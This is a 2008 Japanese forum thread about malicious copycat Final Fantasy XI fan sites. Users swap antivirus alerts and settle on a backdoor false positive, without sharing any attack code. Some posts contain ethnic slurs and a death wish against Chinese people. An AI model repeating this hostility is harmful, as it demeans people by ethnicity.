>>521 :既にその名前は使われています:2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ

VBS:Malware-gen
ウイルス/ワーム
080915-0, 2008/09/15

JS:Agent-AU [Expl]
Exploit
080915-0, 2008/09/15

だそうです
558既にその名前は使われています:2008/09/17(水) 06:03:36 ID:vl3qytsv
だからおまいさんはスレの少し上を嫁と
559既にその名前は使われています:2008/09/17(水) 06:04:03 ID:S1GzY0IC
おいおい・・・なんつー物騒な世の中じゃ・・・・
もうhttp自体NGワードに指定しときました
560既にその名前は使われています:2008/09/17(水) 07:34:49 ID:E6cr+M/r
seedsの方、踏んでみたらノートン先生が反応
HTTP Yahoo! Messenger CYFT Ctrl Get File
561既にその名前は使われています:2008/09/17(水) 08:08:38 ID:NxcPsFYg
>>555
罠サイトのほう、カスペじゃ検知できないように作られてる?
アーガスのカスペのマルウェアチェック素通りしてる。
562既にその名前は使われています:2008/09/17(水) 08:45:20 ID:mXLU/bDL
メンテ明け早々に差出人不明でHugecheap.comのメッセ来てるわ
気持ちわりいなこれ
563既にその名前は使われています:2008/09/17(水) 09:00:06 ID:4n8eurLN
あーこれは酷いな、最低だ
564既にその名前は使われています:2008/09/17(水) 09:04:19 ID:Za+zLKJg
AVG先生とアーガスじゃ反応しないな
注意しておけよ〜
565既にその名前は使われています:2008/09/17(水) 09:10:24 ID:tS7jQV/9
RealPlayerの脆弱性関係?

ところでAntiVirはどうだい?
566既にその名前は使われています:2008/09/17(水) 09:49:35 ID:P61R2rp9
Seeds/の方、ウィルスバスター2009が反応しました。
HTML_IFRAME.ATW
というウィルスが隔離されていました。
567既にその名前は使われています:2008/09/17(水) 09:54:41 ID:biOYpArr
敵のシナチクは、日本語完璧に理解してるぽいな。
やはり、日本の国費留学生かw
568既にその名前は使われています:2008/09/17(水) 10:10:05 ID:VIFUJp1C
http://www.mozilla.gr.jp/
ただし、Firefox 3.0.2(9/16リリース予定)において、いくつかの大きな修正 がされているため、
Firefox 2 から 3 へ更新される際は充分検討の上アップデートされますようお願いいたします。

まだVUこないな・・・
■と違ってちゃんとテストしてるからいい加減なものは出せないんだろうけど。
569既にその名前は使われています:2008/09/17(水) 10:14:47 ID:RNuwTKwE
>>567
都会にある中華の学校なら日、中、英は必須科目だ
進学校なら5ヶ国語とかもあるんだぜ

570既にその名前は使われています:2008/09/17(水) 12:06:53 ID:DKjjIGt3
age
571既にその名前は使われています:2008/09/17(水) 12:26:44 ID:3A7DVg5e
>>568
3.0.2来るとはしらなんだ・・・
572既にその名前は使われています:2008/09/17(水) 13:38:16 ID:WSc1nFwt
206からあげ

Seeds/って、スクリプトを完全に不許可にしてたのに
攻撃してきたっていうのは、どんな理屈なんでしょ
573既にその名前は使われています:2008/09/17(水) 14:17:03 ID:iWqWkJQT
3.02は延期らしいよ来週か?
574既にその名前は使われています:2008/09/17(水) 14:52:21 ID:i/HJEyPo
>>572
流行ってる手口がスクリプト注入だっただけで、全部のウイルスがスクリプト使用というわけではない
575既にその名前は使われています:2008/09/17(水) 15:11:08 ID:x3044V7i
>>555
もう削除されとる。
576既にその名前は使われています:2008/09/17(水) 15:18:11 ID:tS7jQV/9
おお 対応早いな
577既にその名前は使われています:2008/09/17(水) 15:39:26 ID:/jSkJ7SD
つーかネット危険すぎ…
578既にその名前は使われています:2008/09/17(水) 15:56:41 ID:1MDU8Pso
582 既にその名前は使われています New! 2008/09/17(水) 13:08:09 ID:0j//Rtx7
Pokoのサイト ウイルス感染してないか?
カスペル反応して駆除したんだが。
Bakdoor.Win32.Agent.rqkって出たんだが。

583 既にその名前は使われています sage New! 2008/09/17(水) 13:32:04 ID:aJnuHXDD
感染というか、管理人が仕込んでるようにしか見えないんだが・・・
バックドアの送信先見れば分かるよ
ポコポコがハックしてるのか?


ttp://ameblo●jp/pokostyle/

バハスレより
うちじゃ反応しないんだがどうかな
579既にその名前は使われています:2008/09/17(水) 16:01:35 ID:ttCyA7Sc
俺のとこにも差出人空白のRMT宣伝ぽいメッセきたぞ
なんなんだこれは
580既にその名前は使われています:2008/09/17(水) 17:22:17 ID:x3044V7i
>>578
有害なコードは見当たらんね。
除去されたのか、偽ページが別にあるのか。
581既にその名前は使われています:2008/09/17(水) 17:35:27 ID:qTU/xbzG
>>578
俺昼過ぎにそこ見たけど何もなかったぞ
そもそもamebloのタグエディタにそんなもんは仕込めんと思うんだが・・・
582既にその名前は使われています:2008/09/17(水) 17:45:57 ID:P7jf/yC4
何か食わされてるか心配になって調べてみたが
書き込みにある Backdoor.Win32.Agent.rqk ってカスペもトレンドマイクロもデータベースにないね
ググッても該当なし
583既にその名前は使われています:2008/09/17(水) 17:49:05 ID:apDiCTi6
今ってヴァナモンとかAH(競売オンライン)とか安全なの?
怖くて最近みてないんだけど・・・
584既にその名前は使われています:2008/09/17(水) 17:51:47 ID:GH1yHG71
スレ住人:今安全だよ^^

その後罠が仕掛けられる

>>583:ハックされた!おまえらのせいだ!
585既にその名前は使われています:2008/09/17(水) 18:11:23 ID:/jSkJ7SD
>v<;
586既にその名前は使われています:2008/09/17(水) 18:19:34 ID:i/HJEyPo
もう何を見るのも自己責任としか言えないな
587既にその名前は使われています:2008/09/17(水) 18:40:41 ID:x3044V7i
昔からそうなんだけどね。
588既にその名前は使われています:2008/09/17(水) 18:54:09 ID:xnK/nMZC
Bakdoor.Win32.Agent.rqkで
ヤホってみたら135件だったけどな
中途半端なカキコせず詳しく書けチンカス
589既にその名前は使われています:2008/09/17(水) 18:54:50 ID:xnK/nMZC
て誤爆しつれいw
590既にその名前は使われています:2008/09/17(水) 19:13:40 ID:Ze2uf3yX
SSD関連で調べていて行きついたのだけど、Enhanced Write Filter(EWF)を導入することで、OS起動後の変更を
ユーザーが任意でコミットするかどうかを選択できる環境が構築できそう。
クリーンな環境を構築した上で導入すれば、ネカフェもどきのセキュリティが個人でも得られるのではないだろうか。
591既にその名前は使われています:2008/09/17(水) 19:38:04 ID:nuXmB1Xd
>>581
調べてきた
詳しく情報が出てこないなら捏造の可能性があるね

アメブロ禁止タグガイド

アメブロ禁止タグ一覧
・html ・head ・body ・frame ・frameset ・iframe ・object ・param ・server
・javascript ・form ・input ・embed ・textarea ・script

これじゃ仕込みようがないと思う
アメブロが被害出てないのはこういう事じゃないかな
592既にその名前は使われています:2008/09/17(水) 19:39:32 ID:RGGXIHt9
geocities.jpをOpenDnsで弾いてる俺は勝ち組
593既にその名前は使われています:2008/09/17(水) 20:01:51 ID:WSc1nFwt
>>588
単語の羅列に反応して出てくるだけの情報は情報とは言えません
無意味に検査しただけではだめですよ

Backdoor.Win32.Agent.rqk 

Backdoor.Win32.Agentの亜種には違いないとは思うのですけど
データベースへの登録はなさそうですねぇ
594既にその名前は使われています:2008/09/17(水) 20:05:54 ID:WSc1nFwt
Backdoor.Win32.Agent.ce (AVP)
Backdoor.Win32.Agent.aox (Kaspersky)

関連っぽいのはこのあたりかなぁ・・・
実はわたしのところにもいっぴきいるので、いま必死で情報探してます
595既にその名前は使われています:2008/09/17(水) 20:10:21 ID:yy2HO+Y2
>>542
Googleでアド貼ってチェックしてない?
Googleだとあいまいマッチで本家が出てきて「安全」だけど、
SiteAdvisorサイトでURLチェックしたら「不明」になってたよ。

マカ(SiteAdvisor)に精査依頼と、ウィルスサイトとして投稿しておいた。
596既にその名前は使われています:2008/09/17(水) 20:40:04 ID:nEIJ3oAB
91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
サイト:FF11 
http://miku.xrea.jp/template/
597既にその名前は使われています:2008/09/17(水) 20:46:46 ID:mRgroZqM
いつから罠サイト転載スレになったんだよw
598既にその名前は使われています:2008/09/17(水) 20:49:33 ID:WSc1nFwt
>>596
なにがしたいですか?

わざわざxreaのほうを貼らなくてもテンプレに書いてある
ttp://www.geocities.jp/ff11warning/template/を貼れば
いいじゃないですか
599既にその名前は使われています:2008/09/17(水) 20:53:24 ID:wmUlENg2
沈静化してきたと思ったら大間違いだったな
600既にその名前は使われています:2008/09/17(水) 21:24:33 ID:Qw+KYy3F
とりあえず>>596

>>551の引用元の本文(危険URIは省いとく)

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園

の頭の「栽培」と後ろの「ヴァナ・ディール菜園」を消してアドをFFXI WARNINGさんとこのアドレスに書き換えてるだけ。
つーか同じヤツが書き込んでるしなあ。
ホント何したいんかわからんわ。
601既にその名前は使われています:2008/09/17(水) 21:37:56 ID:fpNeVmNw
NoScript1.8.1.2来てる?DLかなんかでエラー出るけど
602既にその名前は使われています:2008/09/17(水) 21:40:24 ID:AAyVqiRo
>>601
ほんとだ。自分もエラーが出た
603既にその名前は使われています:2008/09/17(水) 22:13:48 ID:3h97Nqg9
おれはDLできたが
604既にその名前は使われています:2008/09/17(水) 22:57:21 ID:nEIJ3oAB
2ちゃんねるで垢ハック注意喚起スレ → 逆効果だったりする場合もあり

セキュリティで固めたぜイエイ! → 相互作用バージョンアップも手こずって

http://www.jp.playstation.com/hardware/ps2/scph50000mbnh.html
605既にその名前は使われています:2008/09/17(水) 23:02:17 ID:fpNeVmNw
>>604
ID変えてから出直しておいで
606既にその名前は使われています:2008/09/17(水) 23:03:47 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.2 アップデート (←問題なくアップできました)
607606:2008/09/17(水) 23:05:52 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1.2 アップデート

 1.8.「1.」2 でしたm(_ _)m

608お知らせとお願い:2008/09/17(水) 23:31:30 ID:quvTp1xk
現在多忙で更新できない上にお騒がせしているmiku.xrea.jp昨日の生ログ
84.103.142.61.broad.zs.gd.dynamic.163data.com.cn - - [16/Sep/2008:18:06:10 +0900] "
GET / HTTP/1.1" 302 238
"http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=1039045744&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

1039045744で検索してきやがりました。注意を呼びかけているサイトが軒並み引っかかります。
:88が割と不振で原因調査してるんだったら、ざまぁなんですけどねw
とにかく163data.com.cnの攻撃再開にご注意ください。

>>595
SiteAdvisorは、以前の番地みたいなほうは安全認定でてるとこもあるけど
現行のwww.geocities.jp/userになってから全部グレーゾーンじゃなかったかなぁ。
サブドメインも一まとめに認定してたと思います。
(miku.xrea.jpもxrea.jpとしての扱いですし)

</seedsについてお願い>
スレを読んだ感じだとサーバ内にドロッパ設置してたようですが
状況把握できた方いらっしゃいませんでしょうか?
もしくは/seedsの魚拓とかファイルDLしてお持ちの方いらしたら
お手数ですがレスもしくはご連絡いただけるとすごく喜びます。
609既にその名前は使われています:2008/09/17(水) 23:39:37 ID:Qw+KYy3F
>>604
なんだ>>5の惰弱性君だったのか
610既にその名前は使われています:2008/09/18(木) 00:21:34 ID:0WcOk/15
>>608
ソースは保存してありますけど、それでいいのかな
611既にその名前は使われています:2008/09/18(木) 00:47:18 ID:0WcOk/15
>>608
参考にはならないかもしれませんけど

HTTP Yahoo! Messenger CYTF Ctrl GetFile

↑NIS2008が遮断した 202●93.87.154:80 からの侵入の試みです

そのときに落ちてきたと思われるのが Backdoor.Win32.Agent.rqk

感染したのはハンゲのスターターらしいのですけど、それ、スキャンで
引っかかるのにそのフォルダ(Downloaded Program Files)に探しに行くと
いないんですよね(隠しとかはぜんぶ表示させるようにしてあります)
何回か試してみて、どうしても探せないのでそのまま削除しちゃいました

Backdoor.Win32.Agent の亜種だと思うのですけど、スクリプト以外だと
IRCコマンドの実行とかになるのでしょうか
612既にその名前は使われています:2008/09/18(木) 00:59:47 ID:Ymi7TbYB
おやすみ前のあげ。
613既にその名前は使われています:2008/09/18(木) 01:10:51 ID:JaBgULd1
最近ビビって毎日完全スキャンしてるんだけど(感染してからじゃ遅いのはわかってるけど)
あんまやりすぎるとHDDいかれちゃうかな?
614既にその名前は使われています:2008/09/18(木) 01:41:46 ID:D8au9qIA
アメブロ、あの自由度の低さが敷居を上げていたわけか… 
615既にその名前は使われています:2008/09/18(木) 02:14:14 ID:iFkCwsfx
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1.3 アップデート
616既にその名前は使われています:2008/09/18(木) 02:16:23 ID:0WcOk/15
>>615
ありがとうございます
617既にその名前は使われています:2008/09/18(木) 03:14:30 ID:VJiokB+D
とりあえずnEIJ3oABをサイバーの方と運営に通報してきた
愉快犯はガクブルって家族に迷惑かけて泣け
618既にその名前は使われています:2008/09/18(木) 08:13:15 ID:39T3gO+s
250まで下がってた
619既にその名前は使われています:2008/09/18(木) 09:44:08 ID:7WpJbkU3
>>615
ありがとう。
あれ、でも昨日アップデートしたと思ったんだけどなぁ。また更新されたのか。とりあえず更新しました。
620既にその名前は使われています:2008/09/18(木) 10:59:26 ID:yq/n/Tbz
>>617
通報支援age
621既にその名前は使われています:2008/09/18(木) 11:22:37 ID:IrkBb8P2
罠サイト張ってる奴、またODNじゃねぇだろうな・・・
もう規制は勘弁してくれよ
622既にその名前は使われています:2008/09/18(木) 11:31:32 ID:oQ7YRFQA
>>619
このところ立て続けにヴぁーじょんが上がってるよ
623既にその名前は使われています:2008/09/18(木) 12:14:07 ID:YG/JF+kY
その変換やめる気はにいのか?;
624既にその名前は使われています:2008/09/18(木) 13:35:57 ID:gZFmwDAS
625既にその名前は使われています:2008/09/18(木) 13:56:56 ID:OdWuvaEr
ヴぁあああああああんが1ヴぁああああああああああん
626既にその名前は使われています:2008/09/18(木) 14:09:13 ID:phQUrscp
報告スレ落ちてるのでここに報告させてもらうね
被害確認7/13
サポセンチャットで相談不正アクセス調査依頼
7月終わりごろ
不正アクセス調査結果来たのが9/11だったかな
んでパス復旧してもらって先週末にすぐ復旧依頼送った
んでさっきインしたら巻き戻っていた
ペンギン村住人だったので特殊な例ってことで

おかえりなさい2500万G
627既にその名前は使われています:2008/09/18(木) 14:09:55 ID:phQUrscp
あ、ちなみに依頼送ってから復旧の間凍結なし
いきなり巻き戻ってた
628既にその名前は使われています:2008/09/18(木) 15:13:46 ID:7/OQP30H
>>626ー627
全て慨出。
住所が異世界で〜の理由もすでに過去スレで語られた。

てか、迷惑住所書いて、回りに迷惑かけた自分を先に反省してくれい。
そんな迷惑事を意気揚々と報告されて、マネされるとさらに面倒にしかならん。
あ、保守ありがとね〜
629既にその名前は使われています:2008/09/18(木) 15:24:28 ID:H8weWlm/
NoScriptがまたVer.UPしている age
630既にその名前は使われています:2008/09/18(木) 15:35:12 ID:hTnSTPcP
>>628
迷惑ってwハックした垢使い続けたい業者ですか?w
回りってスクエニのこと?w
つか何いきがってんの?wイミフw
631既にその名前は使われています:2008/09/18(木) 15:45:44 ID:spUyaCr5
何だこいつ
632既にその名前は使われています:2008/09/18(木) 15:50:55 ID:CzJCiZoR
シナチクだろ
633既にその名前は使われています:2008/09/18(木) 16:13:10 ID:1TWH+eNv
文字通りナメック星人だろ
前にも大暴れしてた子
634既にその名前は使われています:2008/09/18(木) 16:23:40 ID:qTfAlswk
>>611
先ほど自分もカスペルでスキャンしたら発見して削除しました。
Backdoor.Win32.Agent.rqk
c:\windows\downloaded program files\hgstartjp25.exe
見つかったのは同じくハンゲのスターターのようですね
635既にその名前は使われています:2008/09/18(木) 17:08:44 ID:KtVGyTks
誤検知だね。報告しといた。
636既にその名前は使われています:2008/09/18(木) 17:17:36 ID:KtVGyTks
ちなみに検出名は >>578 >>582 ね。
637既にその名前は使われています:2008/09/18(木) 17:35:03 ID:bX+SbjLp
seedsサイトの問題とカスペルスキーの誤検出が偶然に重なっただけかぁ
かなり慌てちゃった・・・
638既にその名前は使われています:2008/09/18(木) 17:50:11 ID:gdBAHbNr
Downloaded Program FilesフォルダとかContent.IE5フォルダってアドレスバーに直打ちしないと出てこないよねw
639既にその名前は使われています:2008/09/18(木) 17:56:35 ID:bX+SbjLp
>>638
Explorerの表示設定だと思いますよ

「ツール→フォルダオプション→表示タブ→ファイルとフォルダの表示」で
「すべてのファイルとフォルダを表示する」を選択
同じく「保護されたオペレーティングシステムファイルを表示しない(推奨)」の
チェックを外す

これしてみると、普通にExplorerで見ることできます
640既にその名前は使われています:2008/09/18(木) 18:06:50 ID:KtVGyTks
返答あり。
HgStartJp25.exe
We are sorry, it is false alarm. It will be fixed as soon as possible. Thank you for your help.
すぐ直すそうだ。
641既にその名前は使われています:2008/09/18(木) 18:33:17 ID:emcJszXN
>>639
いや、その設定してもなお、表示されないフォルダだよ。
少なくともXPまではね。Vistaは持ってないから知らないが。

アドレスバー直打ちすればアクセス可能だけどね。
642既にその名前は使われています:2008/09/18(木) 18:47:56 ID:rMuKVct8
>>641
Explorerの表示設定すら弄れないようじゃ、アンタのPCはウィルスだらけだろうな
643既にその名前は使われています:2008/09/18(木) 19:54:40 ID:bX+SbjLp
>>641
見えますよ、XPですけど・・・w
644既にその名前は使われています:2008/09/18(木) 20:14:00 ID:x9jqs78J
>>641
どんだけウィルス入ってるか楽しみだなw
ハックは今週末か来週末ですな
早めにPS2でパス変更を
645既にその名前は使われています:2008/09/18(木) 20:14:33 ID:/H3RM02n
>>641の人気にsit
646既にその名前は使われています:2008/09/18(木) 20:20:00 ID:bX+SbjLp
>>641
ひょっとしたら管理者権限でログオンしてないと隠しは見られないのかなと
思って試してみましたけど、制限ユーザーでも隠しファイルやフォルダは
見ることができました
くどいですけど、システムはWindows XP(SP3)です
本当に見られないとすれば、なにか壊れてる可能性ありますよ
647既にその名前は使われています:2008/09/18(木) 20:45:14 ID:n2rN/cSy
Downloaded Program Filesフォルダは見えるが、Content.IE5フォルダは見えないな・・・
ってか、ずっとアルファベット順に並んでると思ったフォルダが
Downloaded Program Filesといくつかはちょっと離れたところにあったんで見落としてたわ

自分の場合、Temporary Internet Filesはデフォルトの場所から移動させてあるんだが、
デフォルトの位置にはContent.IE5フォルダが見える、隠し属性になってて半透明。
(C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files)
で、実際使ってる方の場所のContent.IE5フォルダはやはり見えない。
(自分の場合はE:\tmp\Temporary Internet Files)
E:\tmp\Temporary Internet Files\Content.IE5ってアドレスバーに入れれば見える。
そうすると、英数8文字の謎のフォルダ4つと、index.dat、desktop.iniがある。


この、index.datが、どんどん大きくなっても削除できなくて困ってるw
648既にその名前は使われています:2008/09/18(木) 20:57:58 ID:VaXIgqcP
>>641ちゃんの反論マダー?
649既にその名前は使われています:2008/09/18(木) 21:13:28 ID:n2rN/cSy
すまんwww俺641wwwww
650既にその名前は使われています:2008/09/18(木) 21:16:41 ID:x9jqs78J
謎の8文字のフォルダはカタカナにして全部並べて後ろから読むと謎が解けるってコナン君が言ってた
651既にその名前は使われています:2008/09/18(木) 21:26:51 ID:bX+SbjLp
>>647
半透明のはダブルクリックすれば中身開きますよ
652既にその名前は使われています:2008/09/18(木) 21:35:58 ID:bX+SbjLp
>>647
Content.IE5はいくつかあっちこっちにありますけど(環境の違い)
Temporary Internet Filesに半透明に出てきたものをExplorerから
ダブルクリックで開けます
653既にその名前は使われています:2008/09/18(木) 21:50:34 ID:Smegs5c4
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(前編) (1/2)
- ITmedia +D Games <http://plusd.itmedia.co.jp/games/articles/0809/18/news077.html>

今更ながらの注意喚起記事
654既にその名前は使われています:2008/09/18(木) 21:52:16 ID:5OtzvxF/
で、1ヶ月以上かかるのか?巻き戻し
655既にその名前は使われています:2008/09/18(木) 22:31:05 ID:x9jqs78J
>>654
2週間ほどっす
656既にその名前は使われています:2008/09/18(木) 22:51:54 ID:vKiovuhn
キャッシュポイズニングの脆弱性あるDNSサーバー、まだ多数存在
http://internet.watch.impress.co.jp/cda/news/2008/09/18/20899.html
657既にその名前は使われています:2008/09/18(木) 23:03:55 ID:WKqwSfR1
OpenDnsでOk
658既にその名前は使われています:2008/09/18(木) 23:57:59 ID:0kxjDIfu
メールアイコンが点滅してたんでPOLいって見てきた
MMORPGの通貨安く売りますだのPLしますだのRMT関連の英語のメールだったorz
@pol.comに無差別送信だろうか、これ
659既にその名前は使われています:2008/09/19(金) 00:24:48 ID:EKXtzkUl
245からあげ
660既にその名前は使われています:2008/09/19(金) 01:19:35 ID:hAysWqou
>>658
フレンドメッセージじゃなくて?

まぁ、フレメッセ送れるくらいならPOLのメールも送りたい放題だろうけど
661既にその名前は使われています:2008/09/19(金) 03:03:00 ID:EKXtzkUl
220からあげ
662既にその名前は使われています:2008/09/19(金) 03:41:02 ID:K2fmtKdb
ヴァナモン行ったら、ファイルのダウンロードをブロックしました【北】

最近見に行っても、真っ白なページか、数頁見ると真っ白なページになる。
なんだこれ
663既にその名前は使われています:2008/09/19(金) 04:04:28 ID:LvnTVfEM
>>662
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.vanamon.com%2F&x=75&y=13
移転した後も、XREAだったのか。orz・・・
664既にその名前は使われています:2008/09/19(金) 04:07:38 ID:9kt5zO5B
URLチェッカーで覗いたけど、ループタグないのgzipがわけわからん
665既にその名前は使われています:2008/09/19(金) 04:09:51 ID:9kt5zO5B
お、インラインフレームタグないのわけワカラン糞長いスクリプト消されたっぽいな
対応はええええ
666既にその名前は使われています:2008/09/19(金) 04:10:20 ID:9kt5zO5B
ごめん、消えてなかった
気のせいだった
667既にその名前は使われています:2008/09/19(金) 04:15:47 ID:9kt5zO5B
ワカランからプロに任せるわ
668既にその名前は使われています:2008/09/19(金) 04:36:04 ID:LSrKdL7K
aguseのスクリーンショットでは普通に見えるけど、Gatewayで行って見ると真っ白だね。何故?
669既にその名前は使われています:2008/09/19(金) 04:45:37 ID:EKXtzkUl
ソースチェッカーもxreaかぁ・・・
弾いてるから使えないなぁ・・・
670既にその名前は使われています:2008/09/19(金) 04:50:52 ID:qPpkoj2a
>>658
アドレスはばれたってことだな。
デフォルトだとIDとの関連もばれるのだろうか?
最近はパスをランダムでブルートフォースとか書いてあっ
671既にその名前は使われています:2008/09/19(金) 04:57:27 ID:PAowZ65u
W32/Rontokbro@mmとかそんな感じのがでてきた
これは垢ハック系なのかな?
672既にその名前は使われています:2008/09/19(金) 05:15:17 ID:zU/SY8Nf
ぐぐるとすぐ出てきたけど
システムを不安定にする大量メール送信ワームだな
673既にその名前は使われています:2008/09/19(金) 05:33:58 ID:PAowZ65u
そうなんだ
じゃあゲームの方はとりあえず心配ないみたいだね
一応削除はしておくけど・・・
674既にその名前は使われています:2008/09/19(金) 07:02:37 ID:JxCSphnP
俺が2CH書き込みに使ってるサイトがゼリアでした!
675既にその名前は使われています:2008/09/19(金) 09:14:25 ID:XLIB9MoQ
「IT製品、ソースコード開示せよ」…中国が外国企業に要求へ
http://www.yomiuri.co.jp/atmoney/news/20080919-OYT1T00011.htm?from=main2

中国は国を挙げておおっぴらにスパイ行為やウィルスバラまきをする気満々だぜの210からあげ
676既にその名前は使われています:2008/09/19(金) 09:35:11 ID:zL52NyXZ
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(前編)
http://plusd.itmedia.co.jp/games/articles/0809/18/news077.html
677既にその名前は使われています:2008/09/19(金) 10:50:52 ID:a1QIo7yK
開示すれば間違いなく中国に逆らえばウィルスを放ってくるようになるよな。
678既にその名前は使われています:2008/09/19(金) 11:37:13 ID:iWQjCmdj
相変わらずあの国は馬鹿丸出しだな。
679既にその名前は使われています:2008/09/19(金) 11:41:37 ID:a1QIo7yK
そのうち セキュリティを守るためにATMのソースを開示せよ とか言ってくるんじゃね?
680608続き:2008/09/19(金) 12:13:18 ID:bLP/d9QW
>>611 および皆様
亀ですみません。ありがとうございます。
/seedsについては 以下の内容であってますでしょうか?

*/seedsというマルパクサイトがあった。
*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)

>>512 >>521の報告で
avast!がJS:Agent-AU [Expl]とVBS:Malware-gen検知

>>512の報告で
re11.htmが反応

>>526の報告で
偽サイトは多数のスクリプト検知

>>560 >>611の報告で(同じ方?)
NIS2008が HTTP Yahoo! Messenger CYTF Ctrl GetFile を警告
(続く)
681608続き その2:2008/09/19(金) 12:14:39 ID:bLP/d9QW
見た目がそっくり?でURLも模倣ということで
悪意を持って作られた事に間違いはないと思うのですが
MMOのアカハク目的と断定するにはちょっと材料が足りない感じです。

ソースその他具体的な判断材料をお持ちの方
日曜まで(月曜には撤収予定) ttp://ffxi■yukikuma■com/に ロダおいときますので
よろしければ圧縮してうぷお願いできませんでしょうか。
(xrea広告つきサーバ 5Mまでです。ごめんなさい。)
サイト管理人と同一人物かどうか確認が必要な場合
今日中にサイトのメールフォームからご連絡いただければ
上記ドメインのメールで返信させていただきます。
一方的なお願いでスレ汚し申し訳ありませんでした。
682既にその名前は使われています:2008/09/19(金) 12:15:02 ID:bG24+3uV
さすが中国。普通なら恥ずかしくていえないことを堂々と言ってのけるぜ。
どんだけ技術を盗み、悪用しようとしてるんだ。
683既にその名前は使われています:2008/09/19(金) 12:16:28 ID:a1QIo7yK
福田ならサラッと開示しそうだったから辞めてよかったな。
684既にその名前は使われています:2008/09/19(金) 14:04:54 ID:XLIB9MoQ
238からあげ
685既にその名前は使われています:2008/09/19(金) 15:33:32 ID:KTml9jVr
200こえたぞーagu
686611:2008/09/19(金) 16:18:46 ID:1kn7D2Kz
>>608(>>680)
>*/seedsというマルパクサイトがあった。
MMOのアカウントハッキング目的なのかどうなのかいまいち判断がつきませんが、模倣HPは存在してました
>*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)
偶然が重なっただけのようで、関連性はなさそうです。

あと、seedsに接続したときにNIS2008が弾いた侵入は

HTTP SnapShot Viewer ActiveX File Download
HTTP BlackIce ActiveX Download Activity
HTTP Yahoo! Messenger CYTF Ctrl GetFile

このみっつでした(履歴を確認してみっつ弾いてました)

>>526はわたしですが、Firefoxのスクリプト反応で、本物は4個、偽物は20個でした
わたし(>>611)は>>560さんとは別人です
687既にその名前は使われています:2008/09/19(金) 16:50:39 ID:RblufQ2J
>>675
中国何言ってんだかw
688既にその名前は使われています:2008/09/19(金) 17:32:43 ID:rm4nB2ZM
2赤でアンマリ使ってないほうのキャラで、アカハックくらったのだが、帰ってきてびっくりした。
ショボイ装備と数万のギルしかなかったんだが、3000万ギルあるぞ。
中華のギル中継に使われてたのかな〜。ボーナス付きでまじうれしい。
689既にその名前は使われています:2008/09/19(金) 17:47:53 ID:gHRDHmxy
この類の話何回目くらいだろう…20は見たよねw
って保守
690既にその名前は使われています:2008/09/19(金) 17:49:05 ID:KTml9jVr
羨ましいというより黙ってたら間違いなくBANだなーくらいにしか思わないな
691既にその名前は使われています:2008/09/19(金) 17:55:44 ID:JxCSphnP
>>688
スクエニから対応の遅れのお詫び
そう考えて俺はいただいた。
692既にその名前は使われています:2008/09/19(金) 17:57:14 ID:JxCSphnP
>>690
まじかw
693既にその名前は使われています:2008/09/19(金) 18:03:34 ID:ZdZgo8qp
ID:JxCSphnPはID:rm4nB2ZMなの?
694既にその名前は使われています:2008/09/19(金) 19:29:02 ID:qDqxOo6m
キティか業者のタゲそらしだろ
ほっときな
695既にその名前は使われています:2008/09/19(金) 19:40:31 ID:mf6Cdvub
俺はNAっぽいフレ登録されたオマケだけだったがw
中華が転売したのかな
696既にその名前は使われています:2008/09/19(金) 20:51:25 ID:P7fJg1k4
差出人が---のRMT案内メールって、昔のフレのPOLアドレス使って送られてるんだろ?
何かムカツクな
697既にその名前は使われています:2008/09/19(金) 21:10:38 ID:LvnTVfEM
ヴァナモンは安全?
698既にその名前は使われています:2008/09/19(金) 21:17:03 ID:a1QIo7yK
ネットに絶対安全なんてものはない。
699既にその名前は使われています:2008/09/19(金) 21:30:10 ID:FT/Nkaho
巻き戻し申請中でもPOLにはインできるんだよね?
POLのメールのパスワード変え忘れていたので、
POLにインしようとしたらパスワードが違うと出てくるという事は
またやられたのかな?クリーンインストールしてからFF11も入れなおして、
セキュリティソフトもPG2も入れてるのにどこでやられたのだろう・・・
700既にその名前は使われています:2008/09/19(金) 21:46:04 ID:qPpkoj2a
>>699
PG2だけなら効果は無いに等しいのでは?
701既にその名前は使われています:2008/09/19(金) 21:49:42 ID:qPpkoj2a
上に出てるギルが増えていた件はフレも言ってたよ。金額とか確認していないし。
もうログインしてこない感じだからその後は確認できないけど。
702既にその名前は使われています:2008/09/19(金) 21:51:55 ID:FT/Nkaho
いや、バスターの2008も入れてブラウザもFirefoxにしてNoScriptmeも
入れたのに。もうPC版でやるのはやめよう。360版買ってこようかな。
703既にその名前は使われています:2008/09/19(金) 21:57:31 ID:qPpkoj2a
>>702
それがおすすめだね
704既にその名前は使われています:2008/09/19(金) 22:11:28 ID:P7fJg1k4
最近はヴァナモンすら使うの控えてるな
FF用語辞典で調べ物したりしてるし
あとはElemenとかえふめもとか大手どころくらいしか怖くてつかえないな
リンクなんて何処も論外すぎてふめねー

なんなのこれフザケテルノー
705既にその名前は使われています:2008/09/19(金) 22:28:52 ID:bqFmZoA8
ヴァナモンなんて実際にハッキングされたし
大手だからって安心できるわけじゃないだろうに
FF専用マシンが絶対必要
706既にその名前は使われています:2008/09/19(金) 22:35:34 ID:P7fJg1k4
もうシナ畜糞過ぎ
死ねよ中国人…
707既にその名前は使われています:2008/09/19(金) 22:35:58 ID:urUENrtI
箱○の最適化とPS3版FF11クライアント出ればありがたいんだがな〜
708既にその名前は使われています:2008/09/19(金) 22:36:57 ID:urUENrtI
やった、規制解けた;;
sage進行は危険なのでageマスね^^
709既にその名前は使われています:2008/09/19(金) 23:07:39 ID:QlACI3qz
ハッキング復元してもらって、一週間も経たないうちにまたハッキングさ
れてしまいました。
